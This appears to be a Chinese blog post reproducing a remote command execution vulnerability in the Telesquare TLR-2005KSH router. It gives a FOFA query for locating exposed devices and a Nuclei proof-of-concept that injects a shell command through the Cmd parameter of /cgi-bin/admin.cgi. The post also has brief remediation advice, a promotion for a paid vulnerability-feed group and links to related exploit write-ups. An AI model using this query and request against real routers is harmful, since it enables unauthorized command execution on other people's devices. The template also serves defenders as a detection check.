首页 > 其他分享 >【漏洞复现】Telesquare TLR-2005KSH路由器 cgi-bin接口处存在RCE漏洞

【漏洞复现】Telesquare TLR-2005KSH路由器 cgi-bin接口处存在RCE漏洞

时间:2024-04-08 10:32:47浏览次数:16  
标签:2005KSH cgi 接口处 TLR 漏洞 bin RCE

                        免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使用。

                                                                                                                                              

Ⅰ、漏洞描述

Telesquare TLR-2005KSH路由器 cgi-bin接口处存在RCE漏洞,远程代码执行漏洞,恶意攻击者可能利用此漏洞执行恶意命令,获取服务器敏感信息,最终可能导致服务器失陷。

Ⅱ、fofa语句

app="TELESQUARE-TLR-2005KSH"

Ⅲ、漏洞复现

1、发送数据包,执行命令

Ⅳ、Nuclei-POC

id: Telesquare-TLR-2005KSH-RCE

info:
  name: Telesquare TLR-2005KSH路由器 cgi-bin接口处存在RCE漏洞
  author: WLF
  severity: high
  metadata: 
    fofa-query: app="TELESQUARE-TLR-2005KSH"
variables:
  filename: "{{to_lower(rand_base(10))}}"
  boundary: "{{to_lower(rand_base(20))}}"
http:
  - raw:
      - |
        GET /cgi-bin/admin.cgi?Command=sysCommand&Cmd=echo%20123456 HTTP/1.1
        Host: {{Hostname}}
        User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36
        Content-Length: 0


    matchers:
      - type: dsl
        dsl:
          - status_code==200 && contains_all(body,"123456")

 

Ⅴ、修复建议

1、将网络划分为不同的安全区域,以限制 RCE 攻击的潜在影响;

2、定期检查软件更新,并及时应用安全补丁;

3、设置安全访问控制策略。

 圈子名称:ONEPIECE

限时优惠券:入圈立减20

圈子福利:每天更新最新漏洞情报1~2篇不等,不定时发放现金红包10-30元不等。

 立减20

 

交流群 

 

标签:2005KSH,cgi,接口处,TLR,漏洞,bin,RCE
From: https://blog.csdn.net/weixin_52204925/article/details/137497885

相关文章

  • Nginx 文件名逻辑漏洞(CVE-2013-4547)复现
    漏洞原理影响范围:Nginx0.8.41~1.4.3影响范围:Nginx1.5.0~1.5.7Nginx在解析php文件的时候通常在配置文件中如下配置location~\.php${roothtml;includefastcgi_params;fastcgi_passphp:9000;......
  • 用友GRP-U8 forgetPassword_old.jsp SQL注入漏洞(QVD-2023-31085)
    0x01 免责声明请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。本次测试仅供学习使用,如若非法他用,与平台和本文作者无关,需......
  • Nginx 解析漏洞复现
    该漏洞与php和nginx版本无关,是配置错误导致的问题漏洞描述通常在nginx.conf的配置文件或者include包含的其他配置文件下有以下信息location~\.php${fastcgi_indexindex.php;includefastcgi_params;fastcgi_paramR......
  • PHP imap 远程命令执行漏洞(CVE-2018-19518)漏洞复现
    phpimap扩展用于在PHP中执行邮件收发操作。其imap_open函数会调用rsh来连接远程shell,而debian/ubuntu中默认使用ssh来代替rsh的功能(也就是说,在debian系列系统中,执行rsh命令实际执行的是ssh命令)。因为ssh命令中可以通过设置-oProxyCommand=来调用第三方命令,攻击者通过注入注入这......
  • Redis未授权漏洞复现
    目录Redis漏洞的产生条件及利用Redis环境搭建漏洞复现利用Redis写入Webshell利用Redis写入SSH公钥利用Redis写入计划任务Redis安全防护Redisredis(remotedictionaryserver)是一个key-value存储系统,是跨平台的非关系型数据库。redis默认情况下,会绑定在0.0.0.0:6379,如果没有采用......
  • 【漏洞复现】畅捷通T+ KeyInfoList.aspx SQL注入漏洞
                         免责声明:文章来源互联网收集整理,请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息或者工具而造成的任何直接或者间接的后果及损失,均由使用者本人负责,所产生的一切不良后果与文章作者无关。该文章仅供学习用途使......
  • 5种Race Conditions条件竞争漏洞,你的网站中了哪一个?
    Raceconditions(条件竞速)为常见的漏洞,与业务逻辑缺陷有密切关系。当网站在没有足够保护措施的情况下同时处理请求时,就会发生这种情况。这可能会导致多个不同的执行绪同时互相影响而导致冲突,使应用程式中出现意外行为。常见的攻击方法如下饶过只限一次的申请饶过爆力破解密......
  • PHP-CGI远程代码执行漏洞(CVE-2012-1823)
    影响版本:php<5.3.12orphp<5.4.2cgi、fastcgi、fpm下载PHP源码,可以看到其中有个目录叫sapi。sapi在PHP中的作用,类似于一个消息的“传递者”最常见的sapi应该是用于Apache的mod_php,这个sapi用于php和apache之间的数据交换php-cgi也是一个sapi。在远古的时候,web应用的运......
  • WEB漏洞挖掘详细教程--用户输入合规性(sql注入测试)
    前置教程:WEB漏洞挖掘(SRC)详细教程--信息收集篇-CSDN博客WEB漏洞挖掘(SRC)详细教程--身份认证与业务一致性-CSDN博客WEB漏洞挖掘(SRC)详细教程--业务数据篡改-CSDN博客2.4用户输入合规性2.4.1注入测试a.手动注入1.在参数中输入一个单引号”'”,引起执行查询语句的语法错误,得......
  • Apache漏洞复现
    ApacheHTTPD是一款HTTP服务器,该服务器是现在市场上使用最多的服务器,今天对该中间件做一些漏洞复现ApacheHTTPD换行解析漏洞(CVE-2017-15715)Apache通过mod_php来运行PHP网页影响范围:2.4.0~2.4.29漏洞描述:存在解析漏洞,在解析.php时,会将1.php\x0A当做PHP文件执行,从而绕......